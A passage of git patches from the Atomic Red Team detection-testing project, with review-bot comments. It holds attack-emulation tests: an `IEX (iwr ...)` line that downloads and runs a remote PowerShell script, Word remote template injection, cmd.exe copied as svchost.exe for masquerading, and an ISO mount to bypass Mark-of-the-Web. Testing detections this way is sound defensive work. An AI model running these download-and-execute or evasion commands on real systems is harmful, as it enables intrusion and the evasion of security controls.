[Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome" ``` From 0b52ed3a400f1afacb7860e75416bb849325b60b Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Wed, 9 Jun 2021 10:55:25 -0600 Subject: [PATCH 12/84] remove unused arg, utilize other arg (#1497) --- atomics/T1221/T1221.yaml | 13 ++++++------- 1 file changed, 6 insertions(+), 7 deletions(-) diff --git a/atomics/T1221/T1221.yaml b/atomics/T1221/T1221.yaml index 631277c1..3c554c5f 100644 --- a/atomics/T1221/T1221.yaml 
+++ b/atomics/T1221/T1221.yaml @@ -4,18 +4,17 @@ atomic_tests: - name: WINWORD Remote Template Injection auto_generated_guid: 1489e08a-82c7-44ee-b769-51b72d03521d description: | - Open a .docx file that loads a remote .dotm macro enabled template. Executes the code specified within the .dotm template.Requires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx. Opens Calculator.exe when test sucessfully executed, while AV turned off. + Open a .docx file that loads a remote .dotm macro enabled template from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm + Executes the code specified within the .dotm template. + Requires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx. + Default docs file opens Calculator.exe when test sucessfully executed, while AV turned off. supported_platforms: - windows input_arguments: - docx file: + docx_file: description: Location of the test docx file on the local filesystem. type: Path default: PathToAtomicsFolder\T1221\src\Calculator.docx - dotm template: - description: Location of the test dotm template on the remote server. - type: Path - default: https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm dependency_executor_name: powershell dependencies: - description: | @@ -23,5 +22,5 @@ atomic_tests: get_prereq_command: | executor: command: | - start PathToAtomicsFolder\T1221\src\Calculator.docx + start #{docx_file} name: command_prompt From 1203ffc740b4d70073337b7dd30c2af1d5715e51 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 9 Jun 2021 16:56:00 +0000 Subject: [PATCH 13/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 20 ++++++++------------ atomics/T1221/T1221.md | 10 ++++++---- 2 files changed, 14 insertions(+), 16 deletions(-) 
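Review bot: `start #{docx_file}` breaks as soon as the supplied path contains a space, because `start` treats a quoted first argument as the window title; `start "" "#{docx_file}"` is the safe form now that the path is an input argument instead of the fixed default. The new description points readers at the GitHub `tree/` URL of `opencalc.dotm`, which serves an HTML page rather than the template; if the `.docx` embeds that same URL as its attached template the test cannot work, so the raw-content URL is presumably what the document actually references — worth checking against the document's `settings.xml.rels` and stating in the description. The added description also carries the typos `Ofiice` and `sucessfully`. Per the regenerated index, the `dependencies:` entry still has an empty `description` and `prereq_command`, so the `Requires download of WINWORD` statement is never actually checked.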
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index db3672dc..6715564c 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -34289,30 +34289,26 @@ defense-evasion: atomic_tests: - name: WINWORD Remote Template Injection auto_generated_guid: 1489e08a-82c7-44ee-b769-51b72d03521d - description: 'Open a .docx file that loads a remote .dotm macro enabled template. - Executes the code specified within the .dotm template.Requires download of - WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx. Opens - Calculator.exe when test sucessfully executed, while AV turned off. - -' + description: "Open a .docx file that loads a remote .dotm macro enabled template + from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm + \nExecutes the code specified within the .dotm template.\nRequires download + of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx. + \ \nDefault docs file opens Calculator.exe when test sucessfully executed, + while AV turned off.\n" supported_platforms: - windows input_arguments: - docx file: + docx_file: description: Location of the test docx file on the local filesystem. type: Path default: PathToAtomicsFolder\T1221\src\Calculator.docx - dotm template: - description: Location of the test dotm template on the remote server. - type: Path - default: https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm dependency_executor_name: powershell dependencies: - description: '' prereq_command: '' get_prereq_command: '' executor: - command: 'start PathToAtomicsFolder\T1221\src\Calculator.docx + command: 'start #{docx_file} ' name: command_prompt diff --git a/atomics/T1221/T1221.md b/atomics/T1221/T1221.md index fbad78bd..9f9d5708 100644 --- a/atomics/T1221/T1221.md +++ b/atomics/T1221/T1221.md 
@@ -16,7 +16,10 @@ This technique may also enable [Forced Authentication](https://attack.mitre.org/
## Atomic Test #1 - WINWORD Remote Template Injection -Open a .docx file that loads a remote .dotm macro enabled template. Executes the code specified within the .dotm template.Requires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx. Opens Calculator.exe when test sucessfully executed, while AV turned off. +Open a .docx file that loads a remote .dotm macro enabled template from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm +Executes the code specified within the .dotm template. +Requires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx. +Default docs file opens Calculator.exe when test sucessfully executed, while AV turned off. **Supported Platforms:** Windows @@ -26,15 +29,14 @@ Open a .docx file that loads a remote .dotm macro enabled template. Executes the #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| docx file | Location of the test docx file on the local filesystem. | Path | PathToAtomicsFolder\T1221\src\Calculator.docx| -| dotm template | Location of the test dotm template on the remote server. | Path | https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm| +| docx_file | Location of the test docx file on the local filesystem. | Path | PathToAtomicsFolder\T1221\src\Calculator.docx| #### Attack Commands: Run with `command_prompt`! ```cmd -start PathToAtomicsFolder\T1221\src\Calculator.docx +start #{docx_file} ``` From 3ae4d98bb8ed941503f6be3bb07e582b8bd1e832 Mon Sep 17 00:00:00 2001 
From: rctgardner <59621072+rctgardner@users.noreply.github.com>
Date: Tue, 8 Jun 2021 18:05:29 -0600
Subject: [PATCH 14/84] Added 2 tests for T1036.005 One Windows and one Linux/macOS
---
atomics/T1036.005/T1036.005.yaml | 51 ++++++++++++++++++++++++++++++++
1 file changed, 51 insertions(+)
create mode 100644 atomics/T1036.005/T1036.005.yaml
diff --git a/atomics/T1036.005/T1036.005.yaml b/atomics/T1036.005/T1036.005.yaml
new file mode 100644
index 00000000..05a1bdd7
--- /dev/null
+++ b/atomics/T1036.005/T1036.005.yaml
@@ -0,0 +1,51 @@
+---
+attack_technique: T1036.005
+display_name: 'Masquerading: Match Legitimate Name or Location'
+
+atomic_tests:
+- name: Execute a process from a directory masquerading as the current parent directory.
+ description: |
+ Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`)
+
+ supported_platforms:
+ - macos
+ - linux
+
+ input_arguments:
+ test_message:
+ description: Test message to echo out to the screen
+ type: String
+ default: Hello from the Atomic Red Team test T1036.005#1
+
+ executor:
+ name: sh
+ elevation_required: false
+ command: |
+ mkdir $HOME/...
+ cp $(which sh) $HOME/...
+ $HOME/.../sh -c "echo #{test_message}"
+ cleanup_command: |
+ rm -f $HOME/.../sh
+ rmdir $HOME/.../
+
+- name: Execute a process masquerading as a legitimate Windows binary
+ description: |
+ Create and execute a process masquerading as a legitimate Windows binary
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ test_message:
+ description: Test message to echo out to the screen
+ type: String
+ default: Hello from the Atomic Red Team test T1036.005#2
+
+ executor:
+ name: command_prompt
+ elevation_required: false
+ command: |
+ copy %WINDIR%\System32\cmd.exe /Y %PUBLIC%\svchost.exe
+ start %PUBLIC%\svchost.exe /C echo "#{test_message}"
+ cleanup_command: |
+ del %PUBLIC%\svchost.exe >nul 2>&1
From d3321c6a1f00e3c77b37ddc09e23749791ccbc7d Mon Sep 17 00:00:00 2001
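Review bot: `mkdir $HOME/...` in the first test's command is not repeatable: on a rerun after an incomplete cleanup, mkdir errors on the existing directory and the following `cp` runs anyway, so `mkdir -p $HOME/...` makes the setup idempotent (the cleanup's `rm -f` and `rmdir` are already safe to rerun). In the Windows test, `start %PUBLIC%\svchost.exe /C echo "#{test_message}"` appears to open a separate console that closes as soon as echo returns, so the executor sees neither the output nor the exit code of the masqueraded process; running `%PUBLIC%\svchost.exe /C echo "#{test_message}"` in the foreground would give both. Neither description names the signal a detection engineer should expect from the test, and that is what makes it useful for validating coverage; for example, "Expected detection: a process named svchost.exe whose image path is %PUBLIC% rather than %WINDIR%\System32" and "a shell whose image path contains a `...` directory under $HOME".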
From: Jorge Orchilles <52384511+jorgeorchilles@users.noreply.github.com> Date: Wed, 9 Jun 2021 11:40:30 -0700 Subject: [PATCH 15/84] Create T1553.005 Atomic Test (#1506) * Create T1553.005 * Create T1553.005.yaml * Update T1553.005.yaml * Update T1553.005.yaml * Update T1553.005.yaml * Update T1553.005.yaml * Update T1553.005.yaml * Update T1553.005.yaml * Update T1553.005.yaml * Updated T1553.005 --- atomics/T1553.005/T1553.005.md | 51 ++++++++++++++++++++++++++++ atomics/T1553.005/T1553.005.yaml | 29 ++++++++++++++++ atomics/T1553.005/src/T1553.005.iso | Bin 0 -> 360448 bytes 3 files changed, 80 insertions(+) create mode 100644 atomics/T1553.005/T1553.005.md create mode 100644 atomics/T1553.005/T1553.005.yaml create mode 100644 atomics/T1553.005/src/T1553.005.iso diff --git a/atomics/T1553.005/T1553.005.md b/atomics/T1553.005/T1553.005.md new file mode 100644 index 00000000..50d47c77 --- /dev/null +++ b/atomics/T1553.005/T1553.005.md @@ -0,0 +1,51 @@ +# T1553.005 - Subvert Trust Controls: Mark-of-the-Web Bypass +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1553/005/) +
Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.
+ +## Atomic Tests + +- [Atomic Test #1 - Mount ISO image](#atomic-test-1---mount-iso-image---) + + +
+ +## Atomic Test #1 - Mount ISO image +Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| path_of_iso | Path to ISO file | path | PathToAtomicsFolder\T1553.005\src\T1553.005.iso| + + +#### Attack Commands: Run with `powershell`! + + +``` Mount-DiskImage -ImagePath "#{path_of_iso}"``` + +#### Cleanup Commands: +``` Dismount-DiskImage -ImagePath "#{path_of_iso}"``` + + + +#### Dependencies: Run with `powershell`! +##### Description: T1553.005.iso must exist on disk at specified location (#{path_of_iso}) +##### Check Prereq Commands: +``` +if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +``` +New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null +Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/src/T1553.005.iso -OutFile "#{path_of_iso}" +``` + + + + +
diff --git a/atomics/T1553.005/T1553.005.yaml b/atomics/T1553.005/T1553.005.yaml
new file mode 100644
index 00000000..fe4879b8
--- /dev/null
+++ b/atomics/T1553.005/T1553.005.yaml
@@ -0,0 +1,29 @@
+attack_technique: T1553.005
+display_name: 'Subvert Trust Controls: Mark-of-the-Web Bypass'
+atomic_tests:
+- name: Mount ISO image
+ description: |
+ Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/
+ supported_platforms:
+ - windows
+ input_arguments:
+ path_of_iso:
+ description: Path to ISO file
+ type: path
+ default: PathToAtomicsFolder\T1553.005\src\T1553.005.iso
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ T1553.005.iso must exist on disk at specified location (#{path_of_iso})
+ prereq_command: |
+ if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
+ get_prereq_command: |
+ New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/src/T1553.005.iso -OutFile "#{path_of_iso}"
+ executor:
+ command: |
+ Mount-DiskImage -ImagePath "#{path_of_iso}"
+ cleanup_command: |
+ Dismount-DiskImage -ImagePath "#{path_of_iso}"
+ name: powershell
+
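Review bot: The prerequisite lines quote the path inconsistently: `if (Test-Path #{path_of_iso})` and `(split-path #{path_of_iso})` substitute the value bare, while the executor, the cleanup and `-OutFile "#{path_of_iso}"` quote it, so a path_of_iso containing a space makes the prereq check fail and the directory creation target wrong even though the mount itself would succeed; use `if (Test-Path "#{path_of_iso}") {exit 0} else {exit 1}` and `New-Item -Type Directory (split-path "#{path_of_iso}") -ErrorAction ignore | Out-Null`. `type: path` is lowercase here while the T1221 test on this page uses `type: Path`; the generated docs copy the value verbatim, so matching the existing casing keeps the index consistent. The get_prereq downloads the image and the executor mounts whatever is at that path with no integrity check; comparing `Get-FileHash` output against the hash of the committed src/T1553.005.iso (a value the test would need to record) would make the dependency tamper-evident, since a substituted image would be mounted just the same.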
diff --git a/atomics/T1553.005/src/T1553.005.iso b/atomics/T1553.005/src/T1553.005.iso new file mode 100644 index 0000000000000000000000000000000000000000..5f01ec95159292996ea615bde8feb9af3a411d1b GIT binary patch literal 360448 zcmeI)U5s2+0RZ4L73fj~7pSGJ2p3`nB0HVkwS|^ox}BNrPT8GVW@ZZ|gR)^4tj_L` zovm$+55*S*G3g6vV$=pf9z-HWLc(7#5)FeKo-jQW##k77R{7(fYZYtF(qqQV%H*MUQTR%2h zTR&A8O-4)O#oEqVy*QC;L;;D270Q009C7 z2%IK?cn6o%ch4rH(S#)?Z(lP*8GC%1E)XCBt6y* zOPw4eS=F`pSU2hPw^Ue4fB*pk1m1grV)bxlMg6{bRV__^E-t?w9I1~LlWHY@Q&KGz zwiT07xn8X1$41IAKUuBREBVTJn%Pk*6l+OsYBIe*CZlly_hhA3y0x?PJL#?ct`#Rn z%JovdHaT7#sTGrarCcA$*ONl2mQN<9wvLx-V{vJCTDdk^%$G(>`H_05Qch}>scOEM zO_EwM_Ik8n>@qetT8ec_W+ByS6li*67w$)6wZ3>szaG)zc%oP74<`z^A3)7 z_QUE-_)vWP#QWT0W@Wg1^7YCq$)7gw>VM?7ec@BN+;`T5^>L+Ox9Q`yJHlXR|HeKuCLv3GsadvKaD1@!YwY#;`?%5Z-Q@dYpF3Z%yzS!Pkm<@AbIK=8< zb+{`{!@>ffG7M}7OX|AusQ@PEDPqOcHl zcShX|%}(pt*w5Y=L%1}?N-s^Tr27LgrlB0;g)yeBzWwsApYM-ph_pSq#?o9H#}DnA zkd1$hci0|}*9a$0x^c>ZCLtd-$2L!Fp?v~dBfdRzVLIF$C$|t|JC0%|PP!S=!Ji$% z!F4hHeT?Zu&x`we%0FBC$7Q#dpDARYdh+IPJ(Iq6M~rdO2XBpO8osov)tp`I=F{z? 
zuUB6D%i1-C?=Sz#Z4V9XuU-Dww?FfXpT2S7vtNFD&*JxXe&XF;Ul|*ZkADuX>k3v| zt;KbXcJGtZ*flqO_w2%KI~(8bV||{fxpl{V3aaso)rwz(b@9Fa&)?fK)#igVujk^~ z=iK<6n2VDhtWDMq=U#X%AMW4w_}^c-_|f)VSKb_t&!ixi_hKP_Q0|Q9wYm5;pN}7z zc1Xh2z0<^0+)GaY?f5Yo@06R4r+}rS*QCvK!hyI=JIlSb?wL2Yt?hs8tz~yS_}w?2 zxFR0!{778dS^86O)!5uUv7v=dMJ=oK-zM82J4;;mnQVi(`O);hrPpz6O{OB9^j6FWKCHv@&dmsFG zJpTE#z*vm`*njEb&%gQbwntvQ{_s;Pwx6FK7YGm_K!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ 
zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 W2oNAZfB*pk1PBlyK!CspLf~I%UTI4J literal 0 HcmV?d00001 From b74fd6246cf6970c76d13994bf1200a3b510ce46 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Wed, 9 Jun 2021 18:40:57 +0000 Subject: [PATCH 16/84] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1553.005/T1553.005.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1553.005/T1553.005.yaml b/atomics/T1553.005/T1553.005.yaml index fe4879b8..000674c5 100644 --- a/atomics/T1553.005/T1553.005.yaml +++ b/atomics/T1553.005/T1553.005.yaml @@ -2,6 +2,7 @@ attack_technique: T1553.005 display_name: 'Subvert Trust Controls: Mark-of-the-Web Bypass' atomic_tests: - name: Mount ISO image + auto_generated_guid: 002cca30-4778-4891-878a-aaffcfa502fa description: | Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ supported_platforms: diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 71c27abf..3e4f1628 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -710,3 +710,4 @@ c33f3d80-5f04-419b-a13a-854d1cbdbf3a 126f71af-e1c9-405c-94ef-26a47b16c102 da4f751a-020b-40d7-b9ff-d433b7799803 c35ac4a8-19de-43af-b9f8-755da7e89c89 +002cca30-4778-4891-878a-aaffcfa502fa From 22f3da49600f402eb910a71b6c05977a7e8fb36d Mon Sep 17 00:00:00 2001 
From: CircleCI Atomic Red Team doc generator Date: Wed, 9 Jun 2021 18:41:04 +0000 Subject: [PATCH 17/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-windows.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 3 +- .../Indexes/Indexes-Markdown/windows-index.md | 3 +- atomics/Indexes/Matrices/matrix.md | 2 +- atomics/Indexes/Matrices/windows-matrix.md | 2 +- atomics/Indexes/index.yaml | 37 ++++++++++++++++++- atomics/T1553.005/T1553.005.md | 22 +++++++---- 10 files changed, 60 insertions(+), 15 deletions(-) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index 9934245a..94952e5e 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json 
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true
},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T10
78","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004
","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"